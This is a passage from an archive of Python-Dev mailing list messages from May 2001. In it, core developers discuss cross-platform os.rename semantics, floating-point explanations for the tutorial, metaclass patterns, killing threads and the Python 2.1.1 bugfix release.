From guido at digicool.com Wed May 23 01:46:53 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 22 May 2001 19:46:53 -0400 Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: Your message of "Tue, 22 May 2001 16:54:42 CDT." <15114.57378.887742.531145@beluga.mojam.com> References: <15114.57378.887742.531145@beluga.mojam.com> Message-ID: <200105222346.f4MNkr104833@odiug.digicool.com> > It was brought to my attention a week ago by a client that os.rename > semantics differ between Unix and Windows. On Unix, if the destination file > already exists it is silently deleted. On Windows, an exception is raised. > I was able to verify this for Python 2.0 on Windows98. I assume nothing > changed for 2.1, but I can't verify that. I've always known this, and assumed it was common knowledge. Sorry. ;-) > (Windows trashed my partition > table and my Linux root partition while I was downloading 2.1. > Consequently, I no longer run Windows. Take that, Bill...) I haven't > checked the Mac yet (will do that when I get back to the US), but I think > that os.rename should have the same semantics across all platforms. To the > extent reasonably possible, I think this should also be true of other common > functions exposed through the os module.
> > On the (unsupportable) theory that to-date, more Python apps have been > written and/or deployed on Unix-like systems and that where Windows apps are > concerned, many developers will have added a thin wrapper to mimic the Unix > semantics, I think less breakage would result if the Unix semantics were > implemented in the Windows version. It appears that is what POSIX > compliance would demand as well. > > Skip

I certainly wouldn't want to try to emulate the Windows semantics on Unix. However, I think that emulating the correct Posix semantics on Windows is not possible either. The Posix rename() call guarantees that it is atomic: there is no point in time where the file doesn't exist at all (and a system or program crash can't delete the file). I wouldn't know how to do that in Windows -- the straightforward version

    if os.path.exists(target):
        os.unlink(target)
    os.rename(source, target)

leaves a vulnerability open where the target doesn't exist and if at that point the system crashes or the program is killed, you lose the target. I would prefer to document the difference so applications can decide how to deal with this. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Wed May 23 01:50:29 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 22 May 2001 19:50:29 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Tue, 22 May 2001 14:44:09 PDT." References: Message-ID: <200105222350.f4MNoUj04853@odiug.digicool.com> > Who was it that said every equation will halve your audience? Einstein. > I agree with that, the tutorial should try to be as broad and simple > as possible. But keep in mind that the particular Python tutorial we're talking about is intended for an audience of folks who already know how to program. I vote against dumbing this down.
--Guido van Rossum (home page: http://www.python.org/~guido/) From michel at digicool.com Wed May 23 02:17:59 2001 From: michel at digicool.com (Michel Pelletier) Date: Tue, 22 May 2001 17:17:59 -0700 (PDT) Subject: [Python-Dev] FP vs. tutorial In-Reply-To: <200105222350.f4MNoUj04853@odiug.digicool.com> Message-ID: On Tue, 22 May 2001, Guido van Rossum wrote: > > I agree with that, the tutorial should try to be as broad and simple > > as possible. > > But keep in mind that the particular Python tutorial we're talking > about is intended for an audience of folks who already know how to > program. I vote against dumbing this down. Now that I've actually read the tutorial (wink) I see the true target audience. For some reason, I thought it was oriented more toward the CP4E audience. Is there a python "children's book" complete with big red dogs and rabbits in waistcoats? That would be an interesting project... -Michel From guido at digicool.com Wed May 23 02:20:25 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 22 May 2001 20:20:25 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Tue, 22 May 2001 17:17:59 PDT." References: Message-ID: <200105230020.f4N0KPU05103@odiug.digicool.com> > Is there a python "children's book" complete with big red dogs and rabbits > in waistcoats? That would be an interesting project... See http://www.python.org/sigs/edu-sig/ and http://www.python.org/doc/Intros.html (the latter has a section with intros for non-programmers). --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Wed May 23 02:23:42 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 22 May 2001 20:23:42 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Message-ID: I struggled with a way to do a better job of explaining this stuff last night. 
As I see others already said, the Tutorial is not aimed at script kiddies, or non-programmers, or even programming newbies, but at programmers who are simply new to Python. So everything I put in the tutorial was either jarringly out of place, or inadequate to address the audience you (Michel) have in mind. But I agree that's an important audience, and I spend a fair chunk of my life now anyway explaining this stuff over & over to those who think computing a ratio of two integers is akin to solving fourth order differential equations . In the end I decided to write a Tutorial Appendix in a much gentler style. It doesn't really fit with the rest of the Tutorial, but then that's *why* it's an Appendix. The patch is here: http://sourceforge.net/tracker/index.php?func=detail&aid=426208&group_id=5470&atid=305470 I also changed the tutorial fp examples so they have an excellent chance of displaying the same strings across all platforms, and even if Python 10K defaults to decimal floating-point someday (perhaps in the year 10000, as its name suggests). From gward at python.net Wed May 23 02:33:11 2001 From: gward at python.net (Greg Ward) Date: Tue, 22 May 2001 20:33:11 -0400 Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: <200105222346.f4MNkr104833@odiug.digicool.com>; from guido@digicool.com on Tue, May 22, 2001 at 07:46:53PM -0400 References: <15114.57378.887742.531145@beluga.mojam.com> <200105222346.f4MNkr104833@odiug.digicool.com> Message-ID: <20010522203311.E1245@gerg.ca> On 22 May 2001, Guido van Rossum said: > I would prefer to document the difference so applications can decide > how to deal with this. I agree -- it has always seemed to me that the standard library merely exposes the underlying OS functionality for you. This puts portability somewhat in the hands of the application writer -- with power comes responsibility.
I think that's the way it should be; any attempt to convert OS A to the semantics of OS B will fall down somewhere. Witness the loss-of-atomicity in Guido's example. I'm sure any other semantic difference between OSes would have similar "gotchas" if we attempted to paper over them. Greg -- Greg Ward - just another Python hacker gward at python.net http://starship.python.net/~gward/ Beware of altruism. It is based on self-deception, the root of all evil. From tim.one at home.com Wed May 23 08:31:29 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 23 May 2001 02:31:29 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: <20010522094157.A1245@gerg.ca> Message-ID: [Greg Ward, on http://www.lahey.com/float.htm] > I found this article more useful, interesting, and informative than > whatever I learned about binary floating-point in my academic years. > Good link, Tim. Two catches: > > * I can just barely follow the FORTRAN examples; I very much doubt > the average Python newbie would have any more luck than me The goal is to frighten them: the ones with the right stuff to use fp without destroying a satellite, bringing down the Internet, designing a pacemaker that fails when rounding a corner clockwise at 1.37g, causing a small country's economy to collapse, making jet fighters spontaneously turn upside down when crossing the equator, or triggering WW III by accident, will persist . BTW, not all of those were made up! > * I tried several of the FORTRAN examples in Python, and did not > witness any of the gotchas they are meant to illustrate. Possibly > it's just single-precision vs. double-precision difference, but > Python 2.1 under Linux 2.2 on an Athlon compiled with gcc 2.95.2 > doesn't demonstrate the same gotchas as that article does. You can't illustrate the last half of their examples in Python without playing obscure games with the struct module, because they rely on the existence of more than one size of floating-point type. 
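A hedged sketch of the "obscure games with the struct module" Tim mentions, in modern Python 3 with a hypothetical to_single helper: packing a float into the 4-byte IEEE single format and unpacking it again rounds it to single precision, which is enough to reproduce the mixed-precision comparisons from the second half of the Lahey article.

```python
import struct


def to_single(x):
    """Round a Python float (an IEEE-754 double) to the nearest single.

    The standard-size "<f" format stores 4 bytes; unpacking widens the
    value back to a double, so the result is the single-precision value
    as double-precision code sees it.
    """
    return struct.unpack("<f", struct.pack("<f", x))[0]


# 0.5 is exactly representable in both sizes, so nothing changes ...
print(to_single(0.5) == 0.5)    # True
# ... but 0.1 is not: mixing the two sizes breaks equality.
print(to_single(0.1) == 0.1)    # False
```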
Your lack of luck with the first half of their examples is indeed solely due to the fact that he used single-precision examples and Python's float is double. You need to find different numbers to show the same things in Python; like so:

    # Binary Floating Point
    x = 100000000000. * 0.00000000001
    if x != 1.0:
        print "Oops! It's %r" % x

    # Inexactness
    a = 98. / 49.
    reciprocal = 1./49.
    b = 98. * reciprocal
    if a != b:
        print "Oops! They're %r and %r" % (a, b)

    # Crazy Conversions
    x = 32.05
    y = x * 100.   # "looks like" 3205. if display rounded
    i = int(y)     # actually truncates to 3204
    print y, i, repr(y)

It's Real Work coming up with stuff like that. What I'm hearing is that people won't understand it anyway -- so screw it. If they want an education, they can prove it by doing a google search <0.6 wink>. From tim.one at home.com Wed May 23 08:44:14 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 23 May 2001 02:44:14 -0400 Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: <200105222346.f4MNkr104833@odiug.digicool.com> Message-ID: [Guido] > ... > I certainly wouldn't want to try to emulate the Windows semantics on > Unix. However, I think that emulating the correct Posix semantics on > Windows is not possible either. Neither is it desirable: Windows isn't POSIX, and Windows users would be appalled if os.rename() could silently destroy files. If such a function needs to exist, create a new cowboy_unix_tricks module instead . This has never been a problem for me because I always check to see whether the target file exists before using os.rename(), and do something else if it does. I understand that's vulnerable to races, but nobody asked whether I cared about that . > The Posix rename() call guarantees that it is atomic: there is no > point in time where the file doesn't exist at all (and a system or > program crash can't delete the file).
I wouldn't know how to do > that in Windows -- the straightforward version
>
>     if os.path.exists(target):
>         os.unlink(target)
>     os.rename(source, target)
>
> leaves a vulnerability open where the target doesn't exist and if at > that point the system crashes or the program is killed, you lose the > target. More obviously, it also fails if target simply exists and is open (you can't unlink an open file on Windows). Nevertheless, you can do this renaming safely on Windows, via doing the right system magic to make rename happen at reboot time before Windows actually starts. But I'm not sure Skip's client would want to reboot each time Python did a file rename . > I would prefer to document the difference so applications can decide > how to deal with this. Yup! From MarkH at ActiveState.com Wed May 23 10:55:17 2001 From: MarkH at ActiveState.com (Mark Hammond) Date: Wed, 23 May 2001 18:55:17 +1000 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Message-ID: [Tim on a subject near and dear to his testicles] > It's Real Work coming up with stuff like that. What I'm hearing is that > people won't understand it anyway -- so screw it. If they want > an education, > they can prove it by doing a google search <0.6 wink>. I am inclined to agree. IMO, The Python tutorial or other documentation should include a basic example of these "errors", and a link to _either_ of the HTML pages referenced in this thread as an optional extra. Just enough to stop _most_ of the "this is a bug" posts - but stopping well short of any attempt to "educate" them in floating point madness. Just _one_ example of floats not being exact would suffice. Going from my personal experience, I learnt long ago that floating point is not exact. That is all I needed to know to move on. I didn't like it, and I didn't understand exactly why (I thought I did, but Tim put a stop to that misconception ), but I could move on once I had that skerrick of enlightenment.
And believe it or not, some of my code _does_ use floats, and _does_ work! (well, works as well as the rest of my code anyway ) And-it-wasn't-even-Python-that-taught-me, Mark. From pf at artcom-gmbh.de Wed May 23 09:49:13 2001 From: pf at artcom-gmbh.de (Peter Funk) Date: Wed, 23 May 2001 09:49:13 +0200 (MEST) Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: <15114.57947.313813.522806@cj42289-a.reston1.va.home.com> from "Fred L. Drake, Jr." at "May 22, 2001 06:04:11 pm" Message-ID: Hi, Fred L. Drake, Jr. wrote: > skip at pobox.com writes: > > On the (unsupportable) theory that to-date, more Python apps have been > > written and/or deployed on Unix-like systems and that where Windows apps are > > concerned, many developers will have added a thin wrapper to mimic the Unix > > semantics, I think less breakage would result if the Unix semantics were > > I don't know whether there are more deployed Python apps on Unix > than on Windows (and I've no good idea about how to find out), but I > think unifying the semantics one way or the other is a good thing. > Regardless of which set of semantics is chosen. I agree. May I suggest to add an optional third boolean parameter to os.rename called 'replace', which defaults either to TRUE or FALSE, so modifying existing apps will become even less hassle to potential porters. Here is a strawman to explain what I mean:
--------------------------------------
import os

def new_rename(src, dst, replace=0, old_rename=os.rename):
    if os.path.exists(dst):
        if replace:
            if not os.path.isdir(dst):
                os.remove(dst)
            else:
                # I'm not sure what to do here. recursive removal? dangerous!
                raise NotImplementedError
        else:
            raise OSError("%s already exists" % dst)
    return old_rename(src, dst)

os.rename = new_rename
--------------------------------------
Regards, Peter -- Peter Funk, Oldenburger Str.86, D-27777 Ganderkesee, Germany, Fax:+49 4222950260 office: +49 421 20419-0 (ArtCom GmbH, Grazer Str.8, D-28359 Bremen, Germany) From jack at oratrix.nl Wed May 23 13:15:10 2001 From: jack at oratrix.nl (Jack Jansen) Date: Wed, 23 May 2001 13:15:10 +0200 Subject: [Python-Dev] Assertion failed in dictobject.c Message-ID: <20010523111510.D504D3B8999@snelboot.oratrix.nl> I'm seeing the assert on line 525 in dictobject.c (revision 2.92) failing. The debugger tells me that ma_fill and ma_size are both 8. ma_used is 2, and interestingly hash is also 8. Going back to revision 2.90 fixes the problem (or masks it). -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | ++++ see http://www.xs4all.nl/~tank/ ++++ From skip at pobox.com Wed May 23 13:59:45 2001 From: skip at pobox.com (skip at pobox.com) Date: Wed, 23 May 2001 06:59:45 -0500 Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: References: <200105222346.f4MNkr104833@odiug.digicool.com> Message-ID: <15115.42545.172775.716565@beluga.mojam.com> >>>>> "Tim" == Tim Peters writes: Tim> [Guido] >> I would prefer to document the difference so applications can decide >> how to deal with this. Tim> Yup! Submitted as patch #426598, assigned to Dr. Doc (aka Fred). Skip From skip at pobox.com Wed May 23 14:11:51 2001 From: skip at pobox.com (skip at pobox.com) Date: Wed, 23 May 2001 07:11:51 -0500 Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: References: <15114.57947.313813.522806@cj42289-a.reston1.va.home.com> Message-ID: <15115.43271.480135.227059@beluga.mojam.com> Peter> I agree.
May I suggest to add an optional third boolean Peter> parameter to os.rename called 'replace', which defaults either to Peter> TRUE or FALSE, so modifying existing apps will become even less Peter> hassle to potential porters. In his response to my post, Guido indicated there is a race condition. Between the time you delete the preexisting destination file and do the actual file rename, Windows could wink out on you, leaving you with the original src file and no original dst file. POSIX semantics require the rename to be atomic. This is just not going to be possible. Fred, perhaps my doc mod should be enhanced to identify the race condition for people who need to use os.rename on Windows and will be forced to first unlink the destination file. Skip From guido at digicool.com Wed May 23 15:19:24 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 23 May 2001 09:19:24 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Wed, 23 May 2001 02:31:29 EDT." References: Message-ID: <200105231319.f4NDJOs06485@odiug.digicool.com> I liked the text that Tim posted to SF, but I would like it even better if it also *contained* the text from the "PresentationError" moinmoin wiki page, rather than referring to it by URL. The moinmoin URL is not a good long-term name for that information -- printed copies of the tutorial will persist long after the moinmoin wiki has been moved or consolidated. Plus, instead of referring people to the moinmoin wiki page, I'd like to be able to refer them to the appendix of the tutorial! --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Wed May 23 15:32:17 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 23 May 2001 09:32:17 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Wed, 23 May 2001 18:55:17 +1000." 
References: Message-ID: <200105231332.f4NDWH706564@odiug.digicool.com> [Mark] > IMO, The Python tutorial or other documentation should include a basic > example of these "errors", and a link to _either_ of the HTML pages > referenced in this thread as an optional extra. > > Just enough to stop _most_ of the "this is a bug" posts - but > stopping well short of any attempt to "educate" them in floating > point madness. Just _one_ example of floats not being exact would > suffice. I agree: we don't have to explain *why* it happens. We just have to explain *that* it happens, so folks don't think they've discovered a bug in Python. Or maybe we could do this: in the main text, explain and show *that* it happens, and refer to the appendix which can explain *why* it happens to those interested, in a gentle manner like what Tim already wrote. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Wed May 23 15:52:02 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 23 May 2001 09:52:02 -0400 Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: Your message of "Wed, 23 May 2001 09:49:13 +0200." References: Message-ID: <200105231352.f4NDq3g06738@odiug.digicool.com> > May I suggest to add an optional third boolean parameter to > os.rename called 'replace', which defaults either to TRUE or FALSE, > so modifying existing apps will become even less hassle to potential > porters. I see no reason to change the API. In any case, for backwards compatibility, the default would have to be platform dependent, which strikes me as just as bad as the current situation.
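Leaving the choice to applications, as Guido suggests, might look like the following minimal sketch of the approach Tim describes: check for the target first, and do something else if it exists. It assumes Python 3 (for FileExistsError), and rename_no_clobber is a hypothetical name, not an os function.

```python
import os


def rename_no_clobber(src, dst):
    """Rename src to dst, refusing to replace an existing dst.

    Gives the Windows-style "target exists" failure on every platform.
    The check and the rename are two separate steps, so this is not
    atomic: another process may create dst in between.
    """
    if os.path.exists(dst):
        raise FileExistsError(dst)
    os.rename(src, dst)
```

Because the existence check and the rename are separate steps, the race Tim concedes remains: if another process creates dst in that window, a POSIX rename will still silently replace it.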
--Guido van Rossum (home page: http://www.python.org/~guido/) From thomas at xs4all.net Wed May 23 16:00:25 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Wed, 23 May 2001 16:00:25 +0200 Subject: [Python-Dev] Python 2.1.1 Message-ID: <20010523160025.B690@xs4all.nl> As those of you on python-checkins might have noticed ;) I started checking in Python 2.1.1 bugfixes. I'd hoped to finish all of my backlog today, but unfortunately I'm now called away on a surprise emergency meeting, so I'm not sure if I'll make it. The 2.1.1 tree is in a somewhat unstable state right now; I'll fix that today in any case, but after the meeting. (As for why I started doing it: I just spent about two weeks of digging through Pine sourcecode, and its imap server in particular, and I decided I deserved a break -- Python reads like a Heinlein novel, after pine code: readable, straight-forward, and just enough complexity to keep it entertaining :) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From aahz at rahul.net Wed May 23 16:08:45 2001 From: aahz at rahul.net (Aahz Maruch) Date: Wed, 23 May 2001 07:08:45 -0700 (PDT) Subject: [Python-Dev] Killing threads Message-ID: <20010523140845.B092299C83@waltz.rahul.net> Okay, so we all know it isn't possible to kill threads cleanly and safely in any kind of cross-platform way. At the same time, a program that has a thread running haywire should be able to kill itself completely, so that a monitoring process can restart it. How hard would it be to do only that in a cross-platform way? I'm guessing that for Unix, we'd just send a hard signal (9 or 15). No clue what would need to happen for Windows and Mac. (This got brought up because I experimented with os._exit() as a possible solution, but that GPFs on Win98SE.)
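One hedged way to get the "kill the whole process so a monitor can restart it" half of Aahz's question, sketched in modern Python 3 rather than 2.1: a watchdog thread that, once the worker stops reporting progress, sends its own process a signal that cannot be caught. Watchdog, beat and hard_kill_self are hypothetical names. The Windows fallback relies on os.kill() terminating the process for any signal other than the console CTRL events, which is how current CPython documents it.

```python
import os
import signal
import threading
import time


def hard_kill_self():
    """End the whole process at once, skipping cleanup handlers."""
    # SIGKILL cannot be caught or ignored on Unix. Windows has no SIGKILL;
    # there os.kill() with any other signal number terminates the process.
    sig = getattr(signal, "SIGKILL", signal.SIGTERM)
    os.kill(os.getpid(), sig)


class Watchdog:
    """Call on_stall() if beat() is not called for `timeout` seconds."""

    def __init__(self, timeout, on_stall=hard_kill_self, poll=0.05):
        self.timeout = timeout
        self.on_stall = on_stall
        self.poll = poll
        self._lock = threading.Lock()
        self._last = time.monotonic()
        # Daemon thread, so the watchdog itself never keeps the process alive.
        threading.Thread(target=self._run, daemon=True).start()

    def beat(self):
        """Report progress from the worker thread."""
        with self._lock:
            self._last = time.monotonic()

    def _run(self):
        while True:
            time.sleep(self.poll)
            with self._lock:
                idle = time.monotonic() - self._last
            if idle > self.timeout:
                self.on_stall()
                return
```

The on_stall parameter lets the policy be swapped (for example, logging first); with the default, the process ends and the external monitoring process can restart it.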
-- --- Aahz (@pobox.com) Hugs and backrubs -- I break Rule 6 <*> http://www.rahul.net/aahz/ Androgynous poly kinky vanilla queer het Pythonista I don't really mind a person having the last whine, but I do mind someone else having the last self-righteous whine. From thomas.heller at ion-tof.com Wed May 23 19:28:07 2001 From: thomas.heller at ion-tof.com (Thomas Heller) Date: Wed, 23 May 2001 19:28:07 +0200 Subject: [Python-Dev] New metaclass pattern (Was Re: Simulating Class (was Re: Does Python have Class methods)) References: Message-ID: <020301c0e3ad$bb559790$e000a8c0@thomasnotebook> [this message has also been posted to comp.lang.python] Guido's metaclass hook in Python goes this way: If a base class (let's better call it a 'base object') has a __class__ attribute, this is called to create the new class. From guido at digicool.com Wed May 23 20:02:06 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 23 May 2001 14:02:06 -0400 Subject: [Python-Dev] New metaclass pattern (Was Re: Simulating Class (was Re: Does Python have Class methods)) In-Reply-To: Your message of "Wed, 23 May 2001 19:28:07 +0200." <020301c0e3ad$bb559790$e000a8c0@thomasnotebook> References: <020301c0e3ad$bb559790$e000a8c0@thomasnotebook> Message-ID: <200105231802.f4NI26408784@odiug.digicool.com> > [this message has also been posted to comp.lang.python] [And I'm cc'ing there] > Guido's metaclass hook in Python goes this way: > > If a base class (let's better call it a 'base object') > has a __class__ attribute, this is called to create the > new class.
>
> >From demo/metaclasses/index.html:
>
>     class C(B):
>         a = 1
>         b = 2
>
> Assuming B has a __class__ attribute, this translates into:
>
>     C = B.__class__('C', (B,), {'a': 1, 'b': 2})

Yes.

> Usually B is an instance of a normal class.

No, B should behave like a class, which makes it an instance of a metaclass.
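Guido's point, that B must behave like a class and is therefore an instance of a metaclass, can be checked in modern Python 3, where the hook takes the form of type(B) rather than a __class__ attribute looked up on the base. A minimal sketch with a hypothetical logging metaclass Meta:

```python
class Meta(type):
    """A metaclass that records the name of every class it creates."""

    created = []

    def __new__(mcls, name, bases, namespace):
        cls = super().__new__(mcls, name, bases, namespace)
        Meta.created.append(name)
        return cls


# B behaves like a class, so it is an instance of a metaclass.
B = Meta("B", (), {})


# The class statement looks up type(B), i.e. Meta, and calls it with
# the name, the bases and the dictionary built from the class body.
class C(B):
    a = 1
    b = 2


# Calling the metaclass by hand gives an equivalent class.
D = type(B)("D", (B,), {"a": 1, "b": 2})

print(type(C) is Meta, type(D) is Meta)   # True True
print(Meta.created)                       # ['B', 'C', 'D']
```

Both spellings produce classes whose type is Meta; the class statement merely collects the body into the namespace dictionary before making the same call.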
> So the above code will create an instance of B, > call B's __init__ method with 'C', (B,), and {'a': 1, 'b': 2}, > and assign the instance of B to the variable C. No, it will not create an instance of B. It will create an instance of B.__class__, and that new object (C) is a subclass of B. The difference between subclassing and instantiation is confusing, but crucial, when talking about metaclasses! See the ASCII art in my classic post to the types-sig: http://mail.python.org/pipermail/types-sig/1998-November/000084.html > Ever since, I've played with this metaclass hook, and > always found the problem that B would have to completely > simulate the normal Python behaviour for classes (modifying > of course what you want to change). > > The problem is that there are a lot of successful and > unsuccessful attribute lookups, which require a lot > of overhead when implemented in Python: So the result > is very slow (too slow to be usable in some cases). Yes. You should be able to subclass an existing metaclass! Fortunately, in the descr-branch code in CVS, this is possible. I haven't explored it much yet, but it should be possible to do things like:

    Integer = type(0)
    Class = Integer.__class__   # same as type(Integer)
    class MyClass(Class):
        ...
    MyObject = MyClass("MyObject", (), {})
    myInstance = MyObject()

Here MyClass declares a metaclass, and MyObject is a regular class that uses MyClass for its metaclass. Then, myInstance is an instance of MyObject. See the end of PEP 252 for info on getting the descr-branch code (http://python.sourceforge.net/peps/pep-0252.html). > ------ > > Python 2.1 allows you to attach attributes to function objects, > so a new metaclass pattern can be implemented. > > The idea is to let B be a function having a __class__ attribute > (which does _not_ have to be a class, it can again be a function). Oh, yuck.
I suppose this is fine if you want to experiment with metaclasses in 2.1, but please consider using the descr-branch code instead so you can see what 2.2 will be like! --Guido van Rossum (home page: http://www.python.org/~guido/) From mal at lemburg.com Wed May 23 20:40:58 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 23 May 2001 20:40:58 +0200 Subject: [Python-Dev] Daily Python URL on your Palm Message-ID: <3B0C043A.D5C9C604@lemburg.com> Just thought you might want to know that Fredrik's Daily Python URL can be downloaded onto the Palm as an AvantGo channel. Here's the URL for adding the channel: http://avantgo.com/mydevice/autoadd.html?title=Daily%20Python%20URL&url=http%3A%2F%2Fwww.pythonware.com%2Fdaily%2Findex.htm&max=100&depth=1&images=0&links=1&refresh=always&hours=1&dflags=0&hour=0&quarter=00&s=00 PS: It would be nice if Fredrik could provide a "printable" version of the Daily URL page, since the table layout doesn't work too well on the small Palm display. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From thomas.heller at ion-tof.com Wed May 23 20:57:28 2001 From: thomas.heller at ion-tof.com (Thomas Heller) Date: Wed, 23 May 2001 20:57:28 +0200 Subject: [Python-Dev] New metaclass pattern (Was Re: Simulating Class (was Re: Does Python have Class methods)) References: <020301c0e3ad$bb559790$e000a8c0@thomasnotebook> <200105231802.f4NI26408784@odiug.digicool.com> Message-ID: <033901c0e3ba$36aaa870$e000a8c0@thomasnotebook> Let me try again (and please forgive my mistakes in the details). The usual way (as in demo\metaclasses):

    class B_Meta:
        ....
    B = B_Meta('B', (), {})
    class C(B):
        pass

B is an instance of the (meta)class B_Meta. C is now another instance of the same (meta)class, because B.__class__, which is the (meta)class itself, is called, and returns a new instance.
B_Meta can (and must) implement a lot of behaviour. In contrast, with my recipe:

    def MagicFunction(name, bases, dict):
        ...construct a class on the fly...
        ...create an instance of this class...
        return an_instance_of_a_class

    def B():
        pass
    B.__class__ = MagicFunction

    class C(B):
        pass

Now C is an_instance_of_a_class (which is an instance of a normal Python class), and thus does inherit the normal behaviour of Python classes. Thomas PS: I'm sure this all will be much better in descr-branch. I've checked it out and am playing with it from time to time, but most of the time I have to use released Python versions. From tim.one at home.com Wed May 23 21:32:59 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 23 May 2001 15:32:59 -0400 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: <20010523160025.B690@xs4all.nl> Message-ID: [Thomas Wouters] > > As those of you on python-checkins might have noticed ;) I started > checking in Python 2.1.1 bugfixes. And bless you for it, Thomas! > I'd hoped to finish all of my backlog today, but unfortunately I'm > now called away on a surprise emergency meeting, Now that sucks. Tell your manager that you'll only attend planned emergency meetings from now on: Guido plans Python crises years in advance, and it shows in the relative cleanliness of the Python codebase. From nas at python.ca Wed May 23 21:41:14 2001 From: nas at python.ca (Neil Schemenauer) Date: Wed, 23 May 2001 12:41:14 -0700 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: ; from tim.one@home.com on Wed, May 23, 2001 at 03:32:59PM -0400 References: <20010523160025.B690@xs4all.nl> Message-ID: <20010523124114.A4747@glacier.fnational.com> Tim Peters wrote: > Guido plans Python crises years in advance, and it shows in the > relative cleanliness of the Python codebase. I don't think Thomas has a time machine.
Neil From tim.one at home.com Wed May 23 21:45:06 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 23 May 2001 15:45:06 -0400 Subject: [Python-Dev] Killing threads In-Reply-To: <20010523140845.B092299C83@waltz.rahul.net> Message-ID: [Aahz] > Okay, so we all know it isn't possible to kill threads cleanly and > safely in any kind of cross-platform way. At the same time, a program > that has a thread running haywire should be able to kill itself > completely, so that a monitoring process can restart it. How hard would > it be to do only that in a cross-platform way? Since Python is written in C, and C says nothing about this, you need a platform expert for each platform covered by "cross". > I'm guessing that for Unix, we'd just send a hard signal (9 or 15). No > clue what would need to happen for Windows and Mac. > > (This got brought up because I experimented with os._exit() as a > possible solution, but that GPFs on Win98SE.) Please open a bug report on that, then, with a tiny test case if possible. This worked fine on Win98SE for me just now:

    import thread, os, time

    def task():
        while 1:
            print "x",
            time.sleep(.1)

    for i in range(10):
        thread.start_new_thread(task, ())
    time.sleep(5)
    os._exit(1)

Windows kills all threads spawned by a process when "the main thread" exits. You don't need to do os._exit(), and sys.exit() is normally a much better idea (else, e.g., stdio buffers may not get flushed to disk).
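A minimal sketch of the monitoring setup Aahz describes, assuming Python 3 and the standard subprocess, threading, and textwrap modules; CHILD and run_and_monitor are hypothetical names. The child starts runaway threads and ends itself with os._exit(), and the parent sees the exit status. One difference from Tim's 2001 Windows behaviour: in current CPython, sys.exit() from the main thread waits for non-daemon threads at interpreter shutdown, so a child whose non-daemon threads never finish would hang there, while os._exit() terminates at once at the cost of skipping the stdio flushing Tim mentions.

```python
import subprocess
import sys
import textwrap

# Child program (hypothetical): ten "haywire" non-daemon threads that never
# finish, then the main thread ends the whole process with os._exit().
CHILD = textwrap.dedent("""
    import os
    import threading
    import time

    def runaway():
        while True:              # never returns on its own
            time.sleep(0.01)

    for _ in range(10):
        threading.Thread(target=runaway).start()

    time.sleep(0.2)
    os._exit(3)                  # ends all threads at once; no cleanup, no stdio flush
""")


def run_and_monitor(timeout=10.0):
    """Monitoring side: run the child once and return its exit status."""
    result = subprocess.run([sys.executable, "-c", CHILD], timeout=timeout)
    return result.returncode


if __name__ == "__main__":
    print("child exited with status", run_and_monitor())
```

A supervisor would call run_and_monitor() in a loop and restart the child whenever the status is nonzero.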
From thomas at xs4all.net Wed May 23 22:27:51 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Wed, 23 May 2001 22:27:51 +0200 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: <20010523124114.A4747@glacier.fnational.com>; from nas@python.ca on Wed, May 23, 2001 at 12:41:14PM -0700 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> Message-ID: <20010523222751.G690@xs4all.nl> On Wed, May 23, 2001 at 12:41:14PM -0700, Neil Schemenauer wrote: > Tim Peters wrote: > > Guido plans Python crises years in advance, and it shows in the > > relative cleanliness of the Python codebase. > > I don't think Thomas has a time machine. *Don't* get me started on that. If only Guido would stop hogging the damned thing, I could be a 34-year-old millionaire in a 10-room house and 8 girlfriends! Now-I'm-short-ten-years-nine-million-eight-rooms-and-seven-girlfriends-ly y'rs, -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From tim.one at home.com Wed May 23 22:32:04 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 23 May 2001 16:32:04 -0400 Subject: [Python-Dev] Assertion failed in dictobject.c In-Reply-To: <20010523111510.D504D3B8999@snelboot.oratrix.nl> Message-ID: [Jack Jansen] > I'm seeing the assert on line 525 in dictobject.c (revision 2.92) > failing. The debugger tells me that ma_fill and ma_size are both 8. > ma_used is 2, and 